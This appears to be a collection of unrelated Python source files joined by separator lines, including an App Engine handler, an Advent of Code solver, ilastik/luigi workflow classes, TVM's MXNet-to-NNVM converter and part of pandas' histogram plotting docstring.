b'\x18\x18\x18\x18\x18\x18\x18\x00'\
b'\x70\x18\x18\x0e\x18\x18\x70\x00'\
b'\x76\xdc\x00\x00\x00\x00\x00\x00'\
b'\x00\x10\x38\x6c\xc6\xc6\xfe\x00'\
FONT = memoryview(_FONT)
|
py
|
1a5ef96586a5688fbef953f40b993b74da3b0156
|
import webapp2
import json
from google.appengine.api import users
from google.appengine.ext import ndb
from serializers import default_json_serializer
from models import GoogleAuth
class GoogleAuthApi(webapp2.RequestHandler):
def get(self):
google_auths = GoogleAuth.query_by_user_id(users.get_current_user().user_id()).fetch()
self.response.headers['Content-Type'] = 'application/json'
self.response.out.write(json.dumps([dict(g.to_dict(), **dict(id=g.key.id())) for g in google_auths], default=default_json_serializer))
|
py
|
1a5efa4bf7855a2413523888b5e6fe64a6342c3a
|
from collections import defaultdict, deque
import re
CHALLENGE_DAY = "22"
REAL = open(CHALLENGE_DAY + ".txt").read()
SAMPLE = open(CHALLENGE_DAY + ".sample.txt").read()
SAMPLE_EXPECTED = 306
# SAMPLE_EXPECTED =
def parse_lines(raw):
# Groups.
groups = raw.split("\n\n")
g1 = map(int, groups[0].split("\n")[1:])
q1 = deque(g1)
g2 = map(int, groups[1].split("\n")[1:])
q2 = deque(g2)
return q1, q2
# return list(map(lambda group: group.split("\n"), groups))
# lines = raw.split("\n")
# return lines # raw
# return list(map(lambda l: l.split(" "), lines)) # words.
# return list(map(int, lines))
# return list(map(lambda l: l.strip(), lines)) # beware leading / trailing WS
def solve(raw):
p1, p2 = parse_lines(raw)
# Debug here to make sure parsing is good.
while p1 and p2:
c1 = int(p1.popleft())
c2 = int(p2.popleft())
if c1 > c2:
p1.append(c1)
p1.append(c2)
else:
p2.append(c2)
p2.append(c1)
if p1:
winner = p1
else:
winner = p2
ret = 0
val = 1
while winner:
ret += val * winner.pop()
val += 1
return ret
sample = solve(SAMPLE)
if sample != SAMPLE_EXPECTED:
print("SAMPLE FAILED: ", sample, " != ", SAMPLE_EXPECTED)
assert sample == SAMPLE_EXPECTED
print("\n*** SAMPLE PASSED ***\n")
solved = solve(REAL)
print("SOLUTION: ", solved)
import pandas as pd
df=pd.DataFrame([str(solved)])
df.to_clipboard(index=False,header=False)
print("COPIED TO CLIPBOARD")
|
py
|
1a5efacd3447081a53223623aca9dab92327bdb3
|
import os
import luigi
import uuid
import cluster_tools.utils.volume_utils as vu
from ..graph import GraphWorkflow
from ..cluster_tasks import WorkflowBase
from ..features import EdgeFeaturesWorkflow
from .. import copy_volume as copy_tasks
from . import prediction as predict_tasks
from . import merge_predictions as merge_tasks
from .carving import WriteCarving
class IlastikPredictionWorkflow(WorkflowBase):
input_path = luigi.Parameter()
input_key = luigi.Parameter()
output_path = luigi.Parameter()
output_key = luigi.Parameter()
ilastik_folder = luigi.Parameter()
ilastik_project = luigi.Parameter()
halo = luigi.ListParameter()
n_channels = luigi.IntParameter()
def requires(self):
is_h5 = vu.is_h5(self.output_path)
out_key = None if is_h5 else self.output_key
predict_task = getattr(predict_tasks,
self._get_task_name('Prediction'))
dep = predict_task(tmp_folder=self.tmp_folder,
max_jobs=self.max_jobs,
config_dir=self.config_dir,
input_path=self.input_path,
input_key=self.input_key,
output_path=self.output_path,
output_key=out_key,
ilastik_folder=self.ilastik_folder,
ilastik_project=self.ilastik_project,
halo=self.halo, n_channels=self.n_channels)
        # we only need to merge the predictions separately if the
        # output file is hdf5
if is_h5:
output_prefix = os.path.splitext(self.output_path)[0]
merge_task = getattr(merge_tasks,
self._get_task_name('MergePredictions'))
dep = merge_task(tmp_folder=self.tmp_folder,
max_jobs=self.max_jobs,
config_dir=self.config_dir,
dependency=dep,
input_path=self.input_path,
input_key=self.input_key,
tmp_prefix=output_prefix,
output_path=self.output_path,
output_key=self.output_key,
halo=self.halo,
n_channels=self.n_channels)
return dep
@staticmethod
def get_config():
configs = super(IlastikPredictionWorkflow, IlastikPredictionWorkflow).get_config()
configs.update({'prediction':
predict_tasks.PredictionLocal.default_task_config(),
'merge_predictions':
merge_tasks.MergePredictionsLocal.default_task_config()})
return configs
class IlastikCarvingWorkflow(WorkflowBase):
""" Make carving project with watershed and graph
"""
input_path = luigi.Parameter()
input_key = luigi.Parameter()
watershed_path = luigi.Parameter()
watershed_key = luigi.Parameter()
output_path = luigi.Parameter()
copy_inputs = luigi.BoolParameter(default=False)
def requires(self):
tmp_path = os.path.join(self.tmp_folder, 'exp_data.n5')
graph_key = 'graph'
feat_key = 'feats'
# TODO make param ?
max_jobs_merge = 1
dep = GraphWorkflow(tmp_folder=self.tmp_folder, config_dir=self.config_dir,
max_jobs=self.max_jobs, target=self.target,
dependency=self.dependency,
input_path=self.watershed_path, input_key=self.watershed_key,
graph_path=tmp_path, output_key=graph_key)
dep = EdgeFeaturesWorkflow(tmp_folder=self.tmp_folder, config_dir=self.config_dir,
max_jobs=self.max_jobs, target=self.target, dependency=dep,
input_path=self.input_path, input_key=self.input_key,
labels_path=self.watershed_path,
labels_key=self.watershed_key,
graph_path=tmp_path, graph_key=graph_key,
output_path=tmp_path, output_key=feat_key,
max_jobs_merge=max_jobs_merge)
# write the carving graph data and metadata
uid = str(uuid.uuid1())
dep = WriteCarving(input_path=tmp_path, graph_key=graph_key, features_key=feat_key,
raw_path=self.input_path, raw_key=self.input_key, uid=uid,
output_path=self.output_path, copy_inputs=self.copy_inputs,
dependency=dep)
        # TODO
        # we need to transpose the data before copying;
        # that's why we return here for now and do the transposing outside of
        # cluster_tools, but it should eventually be implemented here as well
return dep
copy_task = getattr(copy_tasks, self._get_task_name('CopyVolume'))
# copy the watershed segmentation to ilastik file
ilastik_seg_key = 'preprocessing/graph/labels'
ilastik_seg_dtype = 'uint32' # TODO is uint32 correct ?
dep = copy_task(tmp_folder=self.tmp_folder, config_dir=self.config_dir,
max_jobs=1, dependency=dep,
input_path=self.watershed_path, input_key=self.watershed_key,
output_path=self.output_path, output_key=ilastik_seg_key,
dtype=ilastik_seg_dtype, prefix='watershed')
# copy the input map to ilastik file
if self.copy_inputs:
ilastik_inp_key = 'Input Data/local_data/%s' % uid
ilastik_inp_dtype = 'float32' # is float32 correct ?
dep = copy_task(tmp_folder=self.tmp_folder, config_dir=self.config_dir,
max_jobs=1, dependency=dep,
input_path=self.input_path, input_key=self.input_key,
output_path=self.output_path, output_key=ilastik_inp_key,
dtype=ilastik_inp_dtype, prefix='inputs')
return dep
@staticmethod
def get_config():
configs = super(IlastikCarvingWorkflow, IlastikCarvingWorkflow).get_config()
configs.update({"copy_volume": copy_tasks.CopyVolumeLocal.default_task_config(),
**EdgeFeaturesWorkflow.get_config(),
**GraphWorkflow.get_config()})
return configs
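# Minimal usage sketch (an illustrative assumption, not part of this module):
# running the prediction workflow with luigi's local scheduler. All paths,
# keys and the inherited WorkflowBase parameters (tmp_folder, config_dir,
# max_jobs, target) are placeholders.
if __name__ == '__main__':
    task = IlastikPredictionWorkflow(
        tmp_folder='./tmp', config_dir='./configs', max_jobs=4, target='local',
        input_path='raw.n5', input_key='raw',
        output_path='prediction.n5', output_key='prediction',
        ilastik_folder='/path/to/ilastik', ilastik_project='pixel_classifier.ilp',
        halo=[32, 32, 32], n_channels=2)
    luigi.build([task], local_scheduler=True)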
|
py
|
1a5efae712176fb5ae77b2d576eb5217b4452583
|
import predict
train_data_path, predict_data_path, predict_output_path = predict.download_data()
for model_id, model_type in predict.MODEL_CONFIGS:
predict.train(train_data_path, model_id, model_type, force_training=True)
|
py
|
1a5efb5dc8368ea3a6ddbfdd4fef9a851d679c42
|
import streamlit as st
import pandas as pd
import pickle
import _pickle as cPickle
with open("setdf.pkl", "rb") as file0:
    setdf = pickle.load(file0)
num_columns = setdf.shape[1]
st.dataframe(setdf)
# checkboxdict = dict()
# for i,row in setdf.iterrows():
# coltuples = st.columns(num_columns+1)
# with coltuples[0]:
# checkboxdict[i]= st.checkbox("",key=i)
# for col in range(num_columns):
# with coltuples[col]:
# st.write(setdf.iloc[i,col])
#for i,row in phendf.iterrows():
|
py
|
1a5efc0e8c937716bc0b8615adc05e7dd70286bb
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, import-self
"""MXNet symbol frontend."""
from __future__ import absolute_import as _abs
import json
import tvm
from .. import symbol as _sym
from .common import get_nnvm_op, required_attr, parse_tshape, parse_bool_str
__all__ = ['from_mxnet']
def _rename(new_name):
def impl(inputs, attrs):
return get_nnvm_op(new_name)(*inputs, **attrs)
return impl
def _pooling(inputs, attrs):
kernel = parse_tshape(required_attr(attrs, 'kernel', 'pooling'))
if len(kernel) != 2:
raise tvm.error.OpAttributeUnImplemented(
'Non-2D kernels are not supported for Pool2D.')
global_pool = 'global' if parse_bool_str(attrs, 'global_pool') else ''
pool_type = required_attr(attrs, 'pool_type', 'pooling')
if pool_type not in ['avg', 'max']:
raise tvm.error.OpNotImplemented(
'Only max and average pooling are supported in frontend MXNet.')
op_name, new_attrs = '_'.join([global_pool, pool_type, 'pool2d']).strip('_'), {}
# new_attrs['layout'] = 'NCHW'
if not global_pool:
new_attrs['pool_size'] = kernel
new_attrs['strides'] = attrs.get('stride', (1, 1))
new_attrs['padding'] = attrs.get('pad', (0, 0))
new_attrs['ceil_mode'] = (attrs.get('pooling_convention', 'valid') == 'full')
if pool_type == 'avg':
new_attrs['count_include_pad'] = attrs.get('count_include_pad', True)
return get_nnvm_op(op_name)(*inputs, **new_attrs)
def _batch_norm(inputs, attrs):
if parse_bool_str(attrs, 'output_mean_var'):
raise tvm.error.OpAttributeUnImplemented(
'Attribute "output_mean_var" is not supported in operator batch_norm.')
# if parse_bool_str(attrs, 'fix_gamma'):
# _warn_not_used('fix_gamma', 'batch_norm')
if parse_bool_str(attrs, 'use_global_stats'):
from warnings import warn
warn(
'Attribute "use_global_stats" is ignored in operator batch_norm.')
# if parse_bool_str(attrs, 'momentum'):
# _warn_not_used('momentum', 'batch_norm')
op_name, new_attrs = 'batch_norm', {}
new_attrs['axis'] = attrs.get('axis', 1)
new_attrs['epsilon'] = attrs.get('eps', 0.001)
new_attrs['center'] = True
new_attrs['scale'] = not parse_bool_str(attrs, 'fix_gamma', default="False")
return get_nnvm_op(op_name)(*inputs, **new_attrs)
def _concat(inputs, attrs):
op_name = 'concatenate'
new_attrs = {'axis': attrs.get('dim', 1)}
return get_nnvm_op(op_name)(*inputs, **new_attrs)
def _conv2d(inputs, attrs):
kernel = parse_tshape(required_attr(attrs, 'kernel', 'conv2d'))
if len(kernel) != 2:
raise tvm.error.OpAttributeUnimplemented(
'Non-2D kernels are not supported for operator Conv2D.')
layout = attrs.get('layout', 'NCHW')
if layout not in ['NCHW', 'NHWC']:
raise tvm.error.OpAttributeUnimplemented(
'Layout {} is not supported in operator Conv2D.'.format(layout))
if 'kernel_layout' in attrs:
kernel_layout = attrs['kernel_layout']
else:
kernel_layout = 'HWIO' if layout == 'NHWC' else 'OIHW'
op_name, new_attrs = 'conv2d', {}
new_attrs['channels'] = required_attr(attrs, 'num_filter', 'conv2d')
new_attrs['kernel_size'] = kernel
new_attrs['strides'] = attrs.get('stride', (1, 1))
new_attrs['padding'] = attrs.get('pad', (0, 0))
new_attrs['dilation'] = attrs.get('dilate', (1, 1))
new_attrs['groups'] = attrs.get('num_group', 1)
new_attrs['layout'] = layout
new_attrs['kernel_layout'] = kernel_layout
new_attrs['use_bias'] = attrs.get('no_bias', 'False').strip() == 'False'
return get_nnvm_op(op_name)(*inputs, **new_attrs)
def _conv2d_transpose(inputs, attrs):
if 'target_shape' in attrs:
raise tvm.error.OpAttributeUnimplemented(
'Attribute "target_shape" is not supported in operator Conv2D-transpose.')
kernel = parse_tshape(required_attr(attrs, 'kernel', 'conv2d_transpose'))
if len(kernel) != 2:
raise tvm.error.OpAttributeInvalid(
'Non-2D kernels are not supported in Conv2D-transpose.')
layout = attrs.get('layout', 'NCHW')
if layout not in ['NCHW', 'NHWC']:
raise tvm.error.OpAttributeUnimplemented(
'Layout {} is not supported in operator Conv2D-transpose.')
if 'kernel_layout' in attrs:
kernel_layout = attrs['kernel_layout']
else:
kernel_layout = 'HWIO' if layout == 'NHWC' else 'OIHW'
op_name, new_attrs = 'conv2d_transpose', {}
new_attrs['channels'] = required_attr(attrs, 'num_filter', 'conv2d_transpose')
new_attrs['kernel_size'] = kernel
new_attrs['strides'] = attrs.get('stride', (1, 1))
new_attrs['output_padding'] = attrs.get('adj', (0, 0))
new_attrs['padding'] = attrs.get('pad', (0, 0))
new_attrs['dilation'] = attrs.get('dilate', (1, 1))
new_attrs['groups'] = attrs.get('num_group', 1)
new_attrs['layout'] = layout
new_attrs['kernel_layout'] = kernel_layout
new_attrs['use_bias'] = not parse_bool_str(attrs, 'no_bias')
return get_nnvm_op(op_name)(*inputs, **new_attrs)
def _dense(inputs, attrs):
import mxnet as mx
op_name, new_attrs = 'dense', {}
new_attrs['units'] = required_attr(attrs, 'num_hidden', 'dense')
new_attrs['use_bias'] = not parse_bool_str(attrs, 'no_bias')
try:
_ = mx.sym.FullyConnected(mx.sym.var('x'), num_hidden=1, flatten=True)
has_flatten = True
except mx.base.MXNetError:
# no flatten attribute in old mxnet
has_flatten = False
use_flatten = parse_bool_str(attrs, 'flatten', 'True')
if has_flatten and use_flatten:
inputs[0] = _sym.flatten(inputs[0])
return get_nnvm_op(op_name)(*inputs, **new_attrs)
def _dropout(inputs, attrs):
op_name, new_attrs = 'dropout', {}
new_attrs['rate'] = attrs.get('p', 0.5)
return get_nnvm_op(op_name)(*inputs, **new_attrs)
def _leaky_relu(inputs, attrs):
act_type = required_attr(attrs, 'act_type', 'leaky_relu')
if act_type in ['leaky', 'prelu']:
op_name, new_attrs = act_type, {}
if act_type == 'leaky':
new_attrs['alpha'] = attrs.get('slope', 0.25)
sym = get_nnvm_op(op_name)(*inputs, **new_attrs)
elif act_type == 'elu':
slope = attrs.get('slope', 0.25)
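        # elu(x) = x for x > 0 and slope * (exp(x) - 1) for x <= 0; the
        # expression below encodes this with two relu terms: relu(x) covers
        # x > 0, and -slope * relu(1 - exp(x)) reduces to slope * (exp(x) - 1)
        # when x <= 0.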
sym = -slope * _sym.relu(1 - _sym.exp(*inputs)) + _sym.relu(*inputs)
elif act_type == 'rrelu':
lower_bound = float(required_attr(attrs, 'lower_bound', 'leaky_relu'))
upper_bound = float(required_attr(attrs, 'upper_bound', 'leaky_relu'))
slope = (lower_bound + upper_bound) / 2.0
op_name, new_attrs = 'leaky_relu', {'alpha': str(slope)}
sym = get_nnvm_op(op_name)(*inputs, **new_attrs)
else:
raise tvm.error.OpNotImplemented(
'Operator {} is not supported in frontend MXNet.'.format(act_type))
return sym
def _activations(inputs, attrs):
act_type = required_attr(attrs, 'act_type', 'activations')
if act_type in ['relu', 'sigmoid', 'tanh']:
op_name, new_attrs = act_type, {}
sym = get_nnvm_op(op_name)(*inputs, **new_attrs)
elif act_type == 'softrelu':
sym = _sym.log((1 + _sym.exp(*inputs)))
else:
raise tvm.error.OpNotImplemented(
'Operator {} is not supported in frontend MXNet.'.format(act_type))
return sym
def _reshape(inputs, attrs):
if parse_bool_str(attrs, 'reverse'):
raise tvm.error.OpAttributeUnimplemented(
'Attribute "reverse" is not supported in operator Reshape.')
op_name, new_attrs = 'reshape', {}
new_attrs['shape'] = required_attr(attrs, 'shape', 'reshape')
return get_nnvm_op(op_name)(*inputs, **new_attrs)
def _slice(inputs, attrs):
begin = attrs.get('begin', None)
end = attrs.get('end', None)
stride = attrs.get('step', None)
if begin is None or end is None:
raise RuntimeError('begin and end are required params')
if 'None' in begin or 'None' in end:
raise RuntimeError('None in begin or end not supported yet...')
new_attrs = {'begin': begin, 'end': end}
if stride is not None:
new_attrs['stride'] = stride
return get_nnvm_op('strided_slice')(inputs[0], **new_attrs)
def _split(inputs, attrs):
op_name, new_attrs = 'split', {}
axis = attrs.get('axis', 1)
new_attrs['indices_or_sections'] = required_attr(attrs, 'num_outputs', 'split')
new_attrs['axis'] = axis
outputs = get_nnvm_op(op_name)(*inputs, **new_attrs)
if parse_bool_str(attrs, 'squeeze_axis'):
squeeze_attrs = {'axis': axis}
outputs = _sym.Group([get_nnvm_op('squeeze')(o, **squeeze_attrs) for o in outputs])
return outputs
def _softmax_activation(inputs, attrs):
op_name, new_attrs = 'softmax', {}
mode = attrs.get('mode', 'instance')
new_attrs['axis'] = 0 if mode == 'instance' else 1
return get_nnvm_op(op_name)(inputs[0], **new_attrs)
def _softmax_output(inputs, attrs):
op_name, new_attrs = 'softmax', {}
if parse_bool_str(attrs, 'multi_output'):
new_attrs['axis'] = 1
return get_nnvm_op(op_name)(inputs[0], **new_attrs)
def _upsampling(inputs, attrs):
scale = attrs.get('scale')
new_attrs = {'scale':int(scale)}
return get_nnvm_op('upsampling')(inputs[0], **new_attrs)
def _clip(inputs, attrs):
op_name, new_attrs = "clip", {}
new_attrs['a_min'] = required_attr(attrs, 'a_min', 'clip')
new_attrs['a_max'] = required_attr(attrs, 'a_max', 'clip')
return get_nnvm_op(op_name)(*inputs, **new_attrs)
def _contrib_multibox_detection(inputs, attrs):
clip = parse_bool_str(attrs, 'clip', default='True')
threshold = attrs.get('threshold') or 0.01
nms_threshold = attrs.get('nms_threshold') or 0.5
force_suppress = parse_bool_str(attrs, 'force_suppress', default='False')
variances = tuple([float(x.strip()) for x in attrs.get('variances').strip('()').split(',')]) \
if attrs.get('variances') is not None else (0.1, 0.1, 0.2, 0.2)
nms_topk = attrs.get('nms_topk') or -1
new_attrs0 = {'clip': clip, 'threshold': float(threshold), 'variances': variances}
new_attrs1 = {'return_indices': False, 'iou_threshold': float(nms_threshold),
'force_suppress': force_suppress, 'top_k': int(nms_topk)}
data, valid_count = get_nnvm_op('multibox_transform_loc')(inputs[0], inputs[1],
inputs[2], **new_attrs0)
return get_nnvm_op('non_max_suppression')(data, valid_count, **new_attrs1)
def _elemwise_sum(inputs, _):
new_attrs = {'num_args':len(inputs)}
return get_nnvm_op('elemwise_sum')(*inputs, **new_attrs)
def _crop_like(inputs, attrs):
new_attrs = {}
offsets = \
tuple([float(x.strip()) for x in attrs.get('offsets').strip('()').split(',')]) \
if attrs.get('offsets') is not None else (0, 0)
if offsets != (0, 0):
raise tvm.error.OpAttributeInvalid(
'crop_like offsets must equal (0,0).')
center_crop = parse_bool_str(attrs, 'center_crop', default="False")
if center_crop:
raise tvm.error.OpAttributeUnimplemented(
'Center crop is not supported in operator crop_like.')
if len(inputs) < 2:
raise tvm.error.OpAttributeUnimplemented("Only support crop_like pattern.")
new_attrs["axis"] = [2, 3]
return get_nnvm_op('slice_like')(inputs[0], inputs[1], **new_attrs)
def _expand_dims(inputs, attrs):
op_name, new_attrs = 'expand_dims', {}
new_attrs['axis'] = required_attr(attrs, 'axis', 'expand_dims')
return get_nnvm_op(op_name)(*inputs, **new_attrs)
def _lrn(inputs, attrs):
op_name, new_attrs = 'lrn', {}
new_attrs['alpha'] = attrs.get('alpha', 0.0001)
new_attrs['beta'] = attrs.get('beta', 0.75)
new_attrs['bias'] = attrs.get('knorm', 2)
# NCHW format and normalization along channel axis
new_attrs['axis'] = 1
new_attrs['size'] = required_attr(attrs, 'nsize', 'lrn')
return get_nnvm_op(op_name)(*inputs, **new_attrs)
def _symbol_ring_buffer(inputs, attrs):
    output = get_nnvm_op('ring_buffer')(*inputs, **attrs)
    return _sym._assign(inputs[1], output)
def _copy(inputs, _):
    return get_nnvm_op('copy')(inputs[0], **{})
# NOTE: this keyword-less _argmax is shadowed by the _argmax defined further
# below, which handles the axis/keepdims attributes.
def _argmax(inputs, attrs):
    return get_nnvm_op('argmax')(*inputs, **attrs)
def _minimum(inputs, attrs):
return get_nnvm_op('broadcast_min')(*inputs, **attrs)
def _maximum(inputs, attrs):
return get_nnvm_op('broadcast_max')(*inputs, **attrs)
def _ones(_, attrs):
op_name = 'ones'
return get_nnvm_op(op_name)(**attrs)
def _zeros(_, attrs):
op_name = 'zeros'
return get_nnvm_op(op_name)(**attrs)
def _argmax(inputs, attrs):
op_name, new_attrs = 'argmax', {}
new_attrs['dtype'] = 'float32'
new_attrs['axis'] = attrs.get('axis', 0)
new_attrs['keepdims'] = parse_bool_str(attrs, 'keepdims', default="False")
return get_nnvm_op(op_name)(*inputs, **new_attrs)
def _argmin(inputs, attrs):
op_name, new_attrs = 'argmin', {}
new_attrs['dtype'] = 'float32'
new_attrs['axis'] = attrs.get('axis', 0)
new_attrs['keepdims'] = parse_bool_str(attrs, 'keepdims', default="False")
return get_nnvm_op(op_name)(*inputs, **new_attrs)
_identity_list = ['__add_scalar__', '__add_symbol__', '__div_scalar__',
'__div_symbol__', '__mul_scalar__', '__mul_symbol__',
'__pow_scalar__', '__rdiv_scalar__', '__rpow_scalar__',
'__rsub_scalar__', '__sub_scalar__', '__sub_symbol__',
'broadcast_add', 'broadcast_div', 'broadcast_mul',
'broadcast_sub', 'broadcast_to', 'cast', 'elemwise_add',
'elemwise_div', 'elemwise_mul', 'elemwise_sub', 'exp',
'flatten', 'log', 'log_softmax', 'max', 'min', 'negative',
'ones_like', 'relu', 'sigmoid', 'slice_like', 'softmax',
'sum', 'tanh', 'transpose', 'zeros_like', 'gather_nd',
'reshape_like', 'where']
_convert_map = {
'_copy' : _rename('copy'),
'_div_scalar' : _rename('__div_scalar__'),
'_minus_scalar' : _rename('__sub_scalar__'),
'_mul_scalar' : _rename('__mul_scalar__'),
'_plus_scalar' : _rename('__add_scalar__'),
'_rdiv_scalar' : _rename('__rdiv_scalar__'),
'_rminus_scalar': _rename('__rsub_scalar__'),
'_contrib_MultiBoxPrior' : _rename('multibox_prior'),
'_contrib_MultiBoxDetection' : _contrib_multibox_detection,
'_minimum' : _minimum,
'_maximum' : _maximum,
'_ones' : _ones,
'_zeros' : _zeros,
'argmax' : _argmax,
'argmin' : _argmin,
'Activation' : _activations,
'BatchNorm' : _batch_norm,
'BatchNorm_v1' : _batch_norm,
'Cast' : _rename('cast'),
'Concat' : _concat,
'Convolution' : _conv2d,
'Convolution_v1': _conv2d,
'Crop' : _crop_like,
'Deconvolution' : _conv2d_transpose,
'Dropout' : _dropout,
'Flatten' : _rename('flatten'),
'FullyConnected': _dense,
'LeakyReLU' : _leaky_relu,
'Pooling' : _pooling,
'Pooling_v1' : _pooling,
'Reshape' : _reshape,
'slice' : _slice,
'SliceChannel' : _split,
'split' : _split,
'Softmax' : _rename('softmax'),
'SoftmaxActivation' : _softmax_activation,
'SoftmaxOutput' : _softmax_output,
'add_n' : _elemwise_sum,
'concat' : _concat,
'max_axis' : _rename('max'),
'min_axis' : _rename('min'),
'reshape' : _reshape,
'sum_axis' : _rename('sum'),
'UpSampling' : _upsampling,
'clip' : _clip,
'expand_dims' : _expand_dims,
'LRN' : _lrn,
'ring_buffer' : _symbol_ring_buffer,
'LinearRegressionOutput' : _copy
}
def _convert_symbol(op_name, inputs, attrs,
identity_list=None,
convert_map=None):
"""Convert from mxnet op to nnvm op.
The converter must specify some conversions explicitly to
support gluon format ops such as conv2d...
Parameters
----------
op_name : str
Operator name, such as Convolution, FullyConnected
inputs : list of nnvm.Symbol
List of input symbols.
attrs : dict
Dict of operator attributes
identity_list : list
List of operators that don't require conversion
convert_map : dict
Dict of name : callable, where name is the op's name that
require conversion to nnvm, callable are functions which
take attrs and return (new_op_name, new_attrs)
Returns
-------
sym : nnvm.Symbol
Converted nnvm Symbol
"""
identity_list = identity_list if identity_list else _identity_list
convert_map = convert_map if convert_map else _convert_map
if op_name in identity_list:
op = get_nnvm_op(op_name)
sym = op(*inputs, **attrs)
elif op_name in convert_map:
sym = convert_map[op_name](inputs, attrs)
else:
raise tvm.error.OpNotImplemented(
'Operator {} is not supported in frontend MXNet.'.format(op_name))
return sym
def _as_list(arr):
"""Force being a list, ignore if already is."""
if isinstance(arr, list):
return arr
return [arr]
def _topo_sort(symbol):
"""Sort all symbols in the mxnet graph in topological order.
Parameters
----------
symbol : mxnet.sym.Symbol
Returns:
-------
list
List of mxnet symbol
"""
queue = []
symbol_map = {}
deps = {}
dep_cnts = {}
for s in symbol:
symbol_map[s.attr('name')] = s
queue.append(s)
while queue:
sym = queue.pop(0)
name = sym.attr('name')
childs = sym.get_children()
if childs is None:
dep_cnts[name] = 0
else:
dep_cnts[name] = len({c.attr('name') for c in childs})
for child in childs:
child_name = child.attr('name')
if child_name not in deps:
deps[child_name] = set()
deps[child_name].add(name)
if child_name not in symbol_map:
symbol_map[child_name] = child
queue.append(child)
order = []
while dep_cnts:
remove = []
for name in dep_cnts:
if dep_cnts[name] == 0:
order.append(symbol_map[name])
remove.append(name)
if name in deps:
for other in deps[name]:
dep_cnts[other] -= 1
for name in remove:
del dep_cnts[name]
return order
def _from_mxnet_impl(symbol, graph):
"""Convert mxnet symbol to nnvm implementation.
Reconstruct a nnvm symbol by traversing the mxnet symbol.
Parameters
----------
symbol : mxnet.sym.Symbol
Incompatible symbol from mxnet, sharing similar graph structure.
The op_name and attrs inside are not always compatible.
graph : dict
Reusable nodes are stored in graph.
Returns:
-------
nnvm.sym.Symbol
Converted symbol
"""
def get_node(sym):
name = sym.attr('name')
if name not in graph:
return None
output_index = json.loads(sym.tojson())['heads'][0][1]
return graph[name][output_index]
assert symbol is not None
# Traverse all symbols in topological order
for sym in _topo_sort(symbol):
name = sym.attr('name')
attr = sym.list_attr()
op_name = sym.attr('op_name')
childs = sym.get_children()
if childs is not None:
childs = [get_node(child) for child in childs]
childs = [x for y in childs for x in _as_list(y)]
node = _convert_symbol(op_name, childs, attr)
elif op_name != 'null':
node = _convert_symbol(op_name, [], attr)
else:
node = _sym.Variable(name=name, **attr)
graph[name] = node
nodes = []
for sym in symbol:
node = get_node(sym)
assert node is not None
nodes.append(node)
if len(nodes) > 1:
return _sym.Group(nodes)
return nodes[0]
def from_mxnet(symbol, arg_params=None, aux_params=None):
"""Convert from MXNet's model into compatible NNVM format.
Parameters
----------
symbol : mxnet.Symbol or mxnet.gluon.HybridBlock
MXNet symbol
arg_params : dict of str to mx.NDArray
The argument parameters in mxnet
aux_params : dict of str to mx.NDArray
The auxiliary parameters in mxnet
Returns
-------
sym : nnvm.Symbol
Compatible nnvm symbol
params : dict of str to tvm.NDArray
The parameter dict to be used by nnvm
"""
try:
import mxnet as mx
except ImportError as e:
raise ImportError('{}. MXNet is required to parse symbols.'.format(e))
if isinstance(symbol, mx.sym.Symbol):
sym = _from_mxnet_impl(symbol, {})
params = {}
arg_params = arg_params if arg_params else {}
aux_params = aux_params if aux_params else {}
for k, v in arg_params.items():
params[k] = tvm.nd.array(v.asnumpy())
for k, v in aux_params.items():
params[k] = tvm.nd.array(v.asnumpy())
elif isinstance(symbol, mx.gluon.HybridBlock):
data = mx.sym.Variable('data')
sym = symbol(data)
sym = _from_mxnet_impl(sym, {})
params = {}
for k, v in symbol.collect_params().items():
params[k] = tvm.nd.array(v.data().asnumpy())
elif isinstance(symbol, mx.gluon.Block):
raise NotImplementedError("Only Hybrid Blocks are supported now.")
else:
msg = "mxnet.Symbol or gluon.HybridBlock expected, got {}".format(type(symbol))
raise ValueError(msg)
if isinstance(sym, list):
sym = _sym.Group(sym)
return sym, params
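# Illustrative usage sketch (an assumption, not part of the frontend itself):
# converting a pretrained Gluon model to an NNVM symbol and parameter dict.
# The model choice is a placeholder; any HybridBlock should work the same way.
if __name__ == '__main__':
    from mxnet.gluon.model_zoo import vision
    block = vision.resnet18_v1(pretrained=True)
    sym, params = from_mxnet(block)
    print('converted; first params:', sorted(params)[:5])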
|
py
|
1a5efee586ee12d02383eaee009eed98ffa6f5b2
|
from __future__ import annotations
import importlib
from typing import (
TYPE_CHECKING,
Optional,
Sequence,
Tuple,
Union,
)
from pandas._config import get_option
from pandas._typing import IndexLabel
from pandas.util._decorators import (
Appender,
Substitution,
)
from pandas.core.dtypes.common import (
is_integer,
is_list_like,
)
from pandas.core.dtypes.generic import (
ABCDataFrame,
ABCSeries,
)
from pandas.core.base import PandasObject
if TYPE_CHECKING:
from pandas import DataFrame
def hist_series(
self,
by=None,
ax=None,
grid: bool = True,
xlabelsize: Optional[int] = None,
xrot: Optional[float] = None,
ylabelsize: Optional[int] = None,
yrot: Optional[float] = None,
figsize: Optional[Tuple[int, int]] = None,
bins: Union[int, Sequence[int]] = 10,
backend: Optional[str] = None,
legend: bool = False,
**kwargs,
):
"""
Draw histogram of the input series using matplotlib.
Parameters
----------
by : object, optional
If passed, then used to form histograms for separate groups.
ax : matplotlib axis object
If not passed, uses gca().
grid : bool, default True
Whether to show axis grid lines.
xlabelsize : int, default None
If specified changes the x-axis label size.
xrot : float, default None
Rotation of x axis labels.
ylabelsize : int, default None
If specified changes the y-axis label size.
yrot : float, default None
Rotation of y axis labels.
figsize : tuple, default None
Figure size in inches by default.
bins : int or sequence, default 10
Number of histogram bins to be used. If an integer is given, bins + 1
bin edges are calculated and returned. If bins is a sequence, gives
bin edges, including left edge of first bin and right edge of last
bin. In this case, bins is returned unmodified.
backend : str, default None
Backend to use instead of the backend specified in the option
``plotting.backend``. For instance, 'matplotlib'. Alternatively, to
specify the ``plotting.backend`` for the whole session, set
``pd.options.plotting.backend``.
.. versionadded:: 1.0.0
legend : bool, default False
Whether to show the legend.
.. versionadded:: 1.1.0
**kwargs
To be passed to the actual plotting function.
Returns
-------
matplotlib.AxesSubplot
